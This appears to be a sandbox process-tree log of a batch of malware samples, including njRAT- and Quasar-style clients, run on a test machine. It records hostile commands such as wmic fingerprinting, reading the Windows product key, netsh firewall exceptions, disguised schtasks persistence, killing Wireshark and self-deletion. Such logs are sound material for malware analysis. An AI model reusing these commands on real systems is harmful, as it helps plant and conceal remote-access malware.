C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵PID:4672
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵PID:6736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵PID:5700
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵PID:768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:3684
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:2784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵PID:1764
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Command and Scripting Interpreter: PowerShell
PID:7160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:5260
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:6512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵PID:6504
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵PID:2312
-
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\4422_8390.exe"C:\Users\Admin\Desktop\Mal\a\4422_8390.exe"3⤵PID:6896
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"4⤵PID:7056
-
-
-
C:\Users\Admin\Desktop\Mal\a\4181_461.exe"C:\Users\Admin\Desktop\Mal\a\4181_461.exe"3⤵PID:6636
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"4⤵PID:6888
-
-
-
C:\Users\Admin\Desktop\Mal\a\EmmetPROD.exe"C:\Users\Admin\Desktop\Mal\a\EmmetPROD.exe"3⤵PID:1544
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic computersystem get name, TotalPhysicalMemory /Value && wmic os get caption /Value && wmic path Win32_VideoController get CurrentHorizontalResolution,CurrentVerticalResolution /Value && ipconfig | find "IPv4" | find /N ":" | find "[1]"4⤵PID:4060
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic computersystem get name, TotalPhysicalMemory /Value5⤵PID:6088
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get caption /Value5⤵PID:7032
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path Win32_VideoController get CurrentHorizontalResolution,CurrentVerticalResolution /Value5⤵PID:6740
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig5⤵
- Gathers network information
PID:3144
-
-
C:\Windows\SysWOW64\find.exefind "IPv4"5⤵PID:5960
-
-
C:\Windows\SysWOW64\find.exefind /N ":"5⤵PID:6952
-
-
C:\Windows\SysWOW64\find.exefind "[1]"5⤵PID:5992
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\lem.exe"C:\Users\Admin\Desktop\Mal\a\lem.exe"3⤵PID:3424
-
-
C:\Users\Admin\Desktop\Mal\a\1374_2790.exe"C:\Users\Admin\Desktop\Mal\a\1374_2790.exe"3⤵PID:6036
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"4⤵PID:464
-
-
-
C:\Users\Admin\Desktop\Mal\a\29.exe"C:\Users\Admin\Desktop\Mal\a\29.exe"3⤵PID:7792
-
-
C:\Users\Admin\Desktop\Mal\a\5.exe"C:\Users\Admin\Desktop\Mal\a\5.exe"3⤵PID:8056
-
-
C:\Users\Admin\Desktop\Mal\a\6.exe"C:\Users\Admin\Desktop\Mal\a\6.exe"3⤵PID:4996
-
-
C:\Users\Admin\Desktop\Mal\a\35.exe"C:\Users\Admin\Desktop\Mal\a\35.exe"3⤵PID:5532
-
-
C:\Users\Admin\Desktop\Mal\a\43.exe"C:\Users\Admin\Desktop\Mal\a\43.exe"3⤵PID:4916
-
-
C:\Users\Admin\Desktop\Mal\a\41.exe"C:\Users\Admin\Desktop\Mal\a\41.exe"3⤵PID:5556
-
-
C:\Users\Admin\Desktop\Mal\a\42.exe"C:\Users\Admin\Desktop\Mal\a\42.exe"3⤵PID:7684
-
-
C:\Users\Admin\Desktop\Mal\a\34.exe"C:\Users\Admin\Desktop\Mal\a\34.exe"3⤵PID:7768
-
-
C:\Users\Admin\Desktop\Mal\a\4.exe"C:\Users\Admin\Desktop\Mal\a\4.exe"3⤵PID:8108
-
-
C:\Users\Admin\Desktop\Mal\a\3.exe"C:\Users\Admin\Desktop\Mal\a\3.exe"3⤵PID:5740
-
-
C:\Users\Admin\Desktop\Mal\a\38.exe"C:\Users\Admin\Desktop\Mal\a\38.exe"3⤵PID:5032
-
-
C:\Users\Admin\Desktop\Mal\a\16.exe"C:\Users\Admin\Desktop\Mal\a\16.exe"3⤵PID:1916
-
-
C:\Users\Admin\Desktop\Mal\a\2.exe"C:\Users\Admin\Desktop\Mal\a\2.exe"3⤵PID:5124
-
-
C:\Users\Admin\Desktop\Mal\a\25.exe"C:\Users\Admin\Desktop\Mal\a\25.exe"3⤵PID:7640
-
-
C:\Users\Admin\Desktop\Mal\a\svchost.exe"C:\Users\Admin\Desktop\Mal\a\svchost.exe"3⤵PID:8148
-
-
C:\Users\Admin\Desktop\Mal\a\systemetape.exe"C:\Users\Admin\Desktop\Mal\a\systemetape.exe"3⤵PID:4176
-
-
C:\Users\Admin\Desktop\Mal\a\systemsound.exe"C:\Users\Admin\Desktop\Mal\a\systemsound.exe"3⤵PID:2584
-
-
C:\Users\Admin\Desktop\Mal\a\Microsoft_Hardware_Launch.exe"C:\Users\Admin\Desktop\Mal\a\Microsoft_Hardware_Launch.exe"3⤵PID:648
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\Mal\a\Microsoft_Hardware_Launch.exe" "Microsoft_Hardware_Launch.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:4956
-
-
-
C:\Users\Admin\Desktop\Mal\a\lastest.exe"C:\Users\Admin\Desktop\Mal\a\lastest.exe"3⤵PID:5832
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵PID:4020
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:4328
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ApplicationFrameHost.exe5⤵
- Kills process with taskkill
PID:7268
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\heo.exe"C:\Users\Admin\Desktop\Mal\a\heo.exe"3⤵PID:7424
-
-
C:\Users\Admin\Desktop\Mal\a\Server.exe"C:\Users\Admin\Desktop\Mal\a\Server.exe"3⤵PID:8064
-
-
C:\Users\Admin\Desktop\Mal\a\Server1.exe"C:\Users\Admin\Desktop\Mal\a\Server1.exe"3⤵PID:7488
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\Mal\a\Server1.exe" "Server1.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:7732
-
-
-
C:\Users\Admin\Desktop\Mal\a\856.exe"C:\Users\Admin\Desktop\Mal\a\856.exe"3⤵PID:6980
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\Mal\a\856.exe" "856.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:7272
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\Desktop\Mal\a\856.exe"4⤵
- Modifies Windows Firewall
PID:5604
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\Mal\a\856.exe" "856.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:5648
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"4⤵PID:900
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:7128
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"5⤵
- Modifies Windows Firewall
PID:2204
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn StUpdate /tr C:\Users\Admin\AppData\Local\Temp/StUpdate.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:7020
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\newest.exe"C:\Users\Admin\Desktop\Mal\a\newest.exe"3⤵PID:6512
-
-
C:\Users\Admin\Desktop\Mal\a\client.exe"C:\Users\Admin\Desktop\Mal\a\client.exe"3⤵PID:4084
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\Mal\a\client.exe" "client.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:7176
-
-
-
C:\Users\Admin\Desktop\Mal\a\ServerRat.exe"C:\Users\Admin\Desktop\Mal\a\ServerRat.exe"3⤵PID:6228
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\Mal\a\ServerRat.exe" "ServerRat.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:6280
-
-
-
C:\Users\Admin\Desktop\Mal\a\govno__dlya_jertwy.exe"C:\Users\Admin\Desktop\Mal\a\govno__dlya_jertwy.exe"3⤵PID:7668
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\Mal\a\govno__dlya_jertwy.exe" "govno__dlya_jertwy.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:7960
-
-
-
C:\Users\Admin\Desktop\Mal\a\Bloxflip%20Predictor.exe"C:\Users\Admin\Desktop\Mal\a\Bloxflip%20Predictor.exe"3⤵PID:6744
-
-
C:\Users\Admin\Desktop\Mal\a\Fast%20Download.exe"C:\Users\Admin\Desktop\Mal\a\Fast%20Download.exe"3⤵PID:7932
-
-
C:\Users\Admin\Desktop\Mal\a\fusca%20game.exe"C:\Users\Admin\Desktop\Mal\a\fusca%20game.exe"3⤵PID:7780
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\Mal\a\fusca%20game.exe" "fusca%20game.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:6660
-
-
-
C:\Users\Admin\Desktop\Mal\a\enai2.exe"C:\Users\Admin\Desktop\Mal\a\enai2.exe"3⤵PID:7788
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\Mal\a\enai2.exe" "enai2.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:2596
-
-
-
C:\Users\Admin\Desktop\Mal\a\njrat.exe"C:\Users\Admin\Desktop\Mal\a\njrat.exe"3⤵PID:4808
-
C:\Windows\rundll32.exe"C:\Windows\rundll32.exe"4⤵PID:5360
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\rundll32.exe" "rundll32.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:3200
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\joiner.exe"C:\Users\Admin\Desktop\Mal\a\joiner.exe"3⤵PID:7232
-
-
C:\Users\Admin\Desktop\Mal\a\testme.exe"C:\Users\Admin\Desktop\Mal\a\testme.exe"3⤵PID:6768
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\Mal\a\testme.exe" "testme.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:5132
-
-
-
C:\Users\Admin\Desktop\Mal\a\sela.exe"C:\Users\Admin\Desktop\Mal\a\sela.exe"3⤵PID:6548
-
-
C:\Users\Admin\Desktop\Mal\a\444.exe"C:\Users\Admin\Desktop\Mal\a\444.exe"3⤵PID:7464
-
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"4⤵PID:2092
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\conhost.exe" "conhost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:7068
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\main.exe"C:\Users\Admin\Desktop\Mal\a\main.exe"3⤵PID:4980
-
C:\ProgramData\dllhost.exe"C:\ProgramData\dllhost.exe"4⤵PID:860
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:5676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:6368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:7212
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:7172
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:6056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:6564
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 5 & Del "C:\Users\Admin\Desktop\Mal\a\main.exe"4⤵PID:5484
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 55⤵PID:5352
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\startup.exe"C:\Users\Admin\Desktop\Mal\a\startup.exe"3⤵PID:7684
-
-
C:\Users\Admin\Desktop\Mal\a\cnct.exe"C:\Users\Admin\Desktop\Mal\a\cnct.exe"3⤵PID:6840
-
C:\Users\Admin\AppData\Local\Temp\dlscord.exe"C:\Users\Admin\AppData\Local\Temp\dlscord.exe"4⤵PID:5340
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\dlscord.exe" "dlscord.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:7604
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\mos%20ssssttttt.exe"C:\Users\Admin\Desktop\Mal\a\mos%20ssssttttt.exe"3⤵PID:4648
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\Mal\a\mos%20ssssttttt.exe" "mos%20ssssttttt.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:7868
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\Desktop\Mal\a\mos%20ssssttttt.exe"4⤵
- Modifies Windows Firewall
PID:6380
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\Mal\a\mos%20ssssttttt.exe" "mos%20ssssttttt.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:1084
-
-
-
C:\Users\Admin\Desktop\Mal\a\testingg.exe"C:\Users\Admin\Desktop\Mal\a\testingg.exe"3⤵PID:1604
-
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"4⤵PID:4392
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:6304
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"5⤵
- Modifies Windows Firewall
PID:4844
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:5116
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\njSilent.exe"C:\Users\Admin\Desktop\Mal\a\njSilent.exe"3⤵PID:5688
-
C:\Windows\svchost.exe"C:\Windows\svchost.exe"4⤵PID:6300
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:7612
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\system.exe"C:\Users\Admin\Desktop\Mal\a\system.exe"3⤵PID:4924
-
C:\Users\Admin\AppData\Local\Temp\system.exe"C:\Users\Admin\AppData\Local\Temp\system.exe"4⤵PID:7632
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\system.exe" "system.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:4796
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\eo.exe"C:\Users\Admin\Desktop\Mal\a\eo.exe"3⤵PID:7444
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Mal\a\eo.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6508
-
-
-
C:\Users\Admin\Desktop\Mal\a\Client-built.exe"C:\Users\Admin\Desktop\Mal\a\Client-built.exe"3⤵PID:7944
-
-
C:\Users\Admin\Desktop\Mal\a\rektupp.exe"C:\Users\Admin\Desktop\Mal\a\rektupp.exe"3⤵PID:3144
-
-
C:\Users\Admin\Desktop\Mal\a\svhost.exe"C:\Users\Admin\Desktop\Mal\a\svhost.exe"3⤵PID:7592
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2524
-
-
-
C:\Users\Admin\Desktop\Mal\a\Java32.exe"C:\Users\Admin\Desktop\Mal\a\Java32.exe"3⤵PID:5264
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2492
-
-
-
C:\Users\Admin\Desktop\Mal\a\x.exe"C:\Users\Admin\Desktop\Mal\a\x.exe"3⤵PID:7224
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "x" /sc ONLOGON /tr "C:\Windows\system32\SubDir\x.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6400
-
-
-
C:\Users\Admin\Desktop\Mal\a\RuntimeBroker.exe"C:\Users\Admin\Desktop\Mal\a\RuntimeBroker.exe"3⤵PID:1840
-
C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"4⤵PID:5608
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UFiCdqpmIf4Y.bat" "5⤵PID:4340
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:10696
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5988
-
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\vanilla.exe"C:\Users\Admin\Desktop\Mal\a\vanilla.exe"3⤵PID:7964
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:7052
-
-
-
C:\Users\Admin\Desktop\Mal\a\Java.exe"C:\Users\Admin\Desktop\Mal\a\Java.exe"3⤵PID:7812
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5476
-
-
-
C:\Users\Admin\Desktop\Mal\a\skibidi.exe"C:\Users\Admin\Desktop\Mal\a\skibidi.exe"3⤵PID:6476
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5432
-
-
-
C:\Users\Admin\Desktop\Mal\a\Client-base.exe"C:\Users\Admin\Desktop\Mal\a\Client-base.exe"3⤵PID:6252
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6576
-
-
-
C:\Users\Admin\Desktop\Mal\a\example_win32_dx11.exe"C:\Users\Admin\Desktop\Mal\a\example_win32_dx11.exe"3⤵PID:5828
-
C:\Users\Admin\AppData\Roaming\Steam\svchost.exe"C:\Users\Admin\AppData\Roaming\Steam\svchost.exe"4⤵PID:8096
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NadQrvDc44xY.bat" "5⤵PID:10036
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:9136
-
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\jignesh.exe"C:\Users\Admin\Desktop\Mal\a\jignesh.exe"3⤵PID:7440
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6580
-
-
-
C:\Users\Admin\Desktop\Mal\a\koptlyyasdrt.exe"C:\Users\Admin\Desktop\Mal\a\koptlyyasdrt.exe"3⤵PID:1696
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:7100
-
-
-
C:\Users\Admin\Desktop\Mal\a\SGVP%20Client%20program.exe"C:\Users\Admin\Desktop\Mal\a\SGVP%20Client%20program.exe"3⤵PID:4028
-
-
C:\Users\Admin\Desktop\Mal\a\Windows12.exe"C:\Users\Admin\Desktop\Mal\a\Windows12.exe"3⤵PID:8728
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "winlogson" /sc ONLOGON /tr "C:\Windows\system32\winlogson\winlogson.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:10664
-
-
-
C:\Users\Admin\Desktop\Mal\a\CollosalLoader.exe"C:\Users\Admin\Desktop\Mal\a\CollosalLoader.exe"3⤵PID:6232
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Skype" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\MSWinpreference.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:10108
-
-
-
C:\Users\Admin\Desktop\Mal\a\discord.exe"C:\Users\Admin\Desktop\Mal\a\discord.exe"3⤵PID:10332
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:8460
-
-
-
C:\Users\Admin\Desktop\Mal\a\Runtime%20Broker.exe"C:\Users\Admin\Desktop\Mal\a\Runtime%20Broker.exe"3⤵PID:10584
-
-
C:\Users\Admin\Desktop\Mal\a\Neverlose%20Loader.exe"C:\Users\Admin\Desktop\Mal\a\Neverlose%20Loader.exe"3⤵PID:5656
-
-
C:\Users\Admin\Desktop\Mal\a\CleanerV2.exe"C:\Users\Admin\Desktop\Mal\a\CleanerV2.exe"3⤵PID:6352
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "CleanerV2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:9532
-
-
-
C:\Users\Admin\Desktop\Mal\a\sharpmonoinjector.exe"C:\Users\Admin\Desktop\Mal\a\sharpmonoinjector.exe"3⤵PID:6636
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:10988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2HCE9YVtZleT.bat" "4⤵PID:8340
-
-
-
C:\Users\Admin\Desktop\Mal\a\Registry.exe"C:\Users\Admin\Desktop\Mal\a\Registry.exe"3⤵PID:9504
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:8800
-
-
-
C:\Users\Admin\Desktop\Mal\a\spectrum.exe"C:\Users\Admin\Desktop\Mal\a\spectrum.exe"3⤵PID:3380
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Mal\a\spectrum.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5968
-
-
-
C:\Users\Admin\Desktop\Mal\a\SGVP%20Client%20System.exe"C:\Users\Admin\Desktop\Mal\a\SGVP%20Client%20System.exe"3⤵PID:11136
-
-
C:\Users\Admin\Desktop\Mal\a\CondoGenerator.exe"C:\Users\Admin\Desktop\Mal\a\CondoGenerator.exe"3⤵PID:9256
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:3540
-
-
-
C:\Users\Admin\Desktop\Mal\a\lmao.exe"C:\Users\Admin\Desktop\Mal\a\lmao.exe"3⤵PID:10700
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:8420
-
-
-
C:\Users\Admin\Desktop\Mal\a\MMO%201.exe"C:\Users\Admin\Desktop\Mal\a\MMO%201.exe"3⤵PID:9424
-
-
C:\Users\Admin\Desktop\Mal\a\fud2.exe"C:\Users\Admin\Desktop\Mal\a\fud2.exe"3⤵PID:7588
-
-
-
C:\PROGRAM FILES\SYSINTERNALS\PROCEXP64.EXE"C:\PROGRAM FILES\SYSINTERNALS\PROCEXP64.EXE" "C:\Windows\system32\taskmgr.exe" /42⤵PID:6740
-
-
C:\Program Files\sysinternals\procexp64.exe"C:\Program Files\sysinternals\procexp64.exe"2⤵
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Sets service image path in registry
- Enumerates connected drives
- Checks processor information in registry
- Suspicious behavior: LoadsDriver
- Suspicious use of SetWindowsHookEx
PID:1736
-
-
C:\Users\Admin\Desktop\Mal\a\systemetape.exe"C:\Users\Admin\Desktop\Mal\a\systemetape.exe"2⤵PID:5676
-
C:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exe"3⤵PID:2496
-
-
-
C:\Users\Admin\Desktop\Mal\a\systemsound.exe"C:\Users\Admin\Desktop\Mal\a\systemsound.exe"2⤵PID:7836
-
-
C:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exe"2⤵PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exe"2⤵PID:6500
-
-
